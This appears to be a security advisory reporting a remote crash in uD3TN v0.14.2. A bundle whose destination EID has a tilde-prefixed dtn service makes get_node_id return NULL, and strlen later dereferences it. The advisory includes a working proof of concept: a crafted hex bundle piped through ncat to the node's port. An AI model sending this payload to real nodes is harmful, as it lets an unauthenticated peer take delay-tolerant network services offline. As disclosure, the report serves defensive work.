NULL Pointer Dereference due to Tilde Character in EID
Summary
A BPv7 bundle whose destination EID is of the dtn scheme and has an SSP beginning with a tilde (e.g. dtn://node18/~tele) causes an immediate segmentation fault following a NULL pointer dereference in uD3TN v0.14.2. Tilde‑prefixed services denote non‑singleton endpoints according to RFC 9171 Section 4.4.5.1.1 and are a legitimate feature of BPv7's dtn scheme to allow multiple nodes to receive the same data.
Minimal Reproducer
The following lines replay a bundle with the following EID (dtn://node18/~tele) which causes the uD3TN node to crash.
# start node (example)
build/posix/ud3tn --node-id dtn://a.dtn/ --aap-port 4242 --aap2-socket ud3tn-a.aap2.socket --cla "mtcp:*,4224" -L 4
# crafted bundle triggering the crash
echo 9f88071a000200040082016e2f2f6e6f646531382f7e74656c6582016e2f2f6e6f646538312f66696c657382016e2f2f6e6f646538312f66696c6573821b0000009e8d0de538001b00000049f16b2400850a020000448218200085010100004443414243ff | python -c "import sys, cbor2; sys.stdout.buffer.write(cbor2.dumps(bytes.fromhex(sys.stdin.read())))" | ncat localhost 4224Changing ~tele to tele in the EID makes the crash disappear, confirming that the tilde is behind the issue.
The same payload does NOT generate a segmentation fault when provided to the data-decoder in the uD3TN repo:
echo 9f88071a000200040082016e2f2f6e6f646531382f7e74656c6582016e2f2f6e6f646538312f66696c657382016e2f2f6e6f646538312f66696c6573821b0000009e8d0de538001b00000049f16b2400850a020000448218200085010100004443414243ff | xxd -r -p > segfault.bin
./build/posix/ud3tndecode -7 segfault.bin
BPv7 bundle
- source: dtn://node81/files
- destination: dtn://node18/~tele
- report to: dtn://node81/files
- creation ts.: 680971330872
- sequence no.: 0
- expires at: 998554274
- payload len.: 4
- proc. flags: 0x20004
- block no. 2 of type = 10 (hop count block)
- flags: 0x0000
- length: 4
- block no. 1 of type = 1 (payload block)
- flags: 0x0000
- length: 4The above crashing bundle is accepted by the bp7-rs implementation
Bug in detail
Using GDB to take a closer look at the issue we find the following crash chain.
- It starts with
bundle_forward()->char *dst_node_id = get_node_id(bundle->destination); - Here
get_node_id()detects the tilde and returnsNULL(non‑singleton endpoint) as seen in the source code snippet below (components/ud3tn/eid.c:275)
// Demux starts with tilde (-> non-singleton EID -> no node ID)
if (delim[1] == '~')
return NULL;bundle_forward()passes this NULL tofib_lookup_node()without validationfib_lookup_node()->HASH(key)->strlen(NULL)__strlen_evexin libc dereferencesNULLleading to the segmentation fault
It seems that uD3TN correctly identifies the case for dtn EID where a non-singleton endpoint is defined and get_node_id() intentionally returns NULL. However, bundle_forward() and downstream FIB functions assume the pointer is never NULL and call strlen() on it.
Impact
- Remote DoS: any unauthenticated peer can crash a uD3TN node by sending a bundle with the EID set to the
dtnscheme and tilde‑prefixed SSP.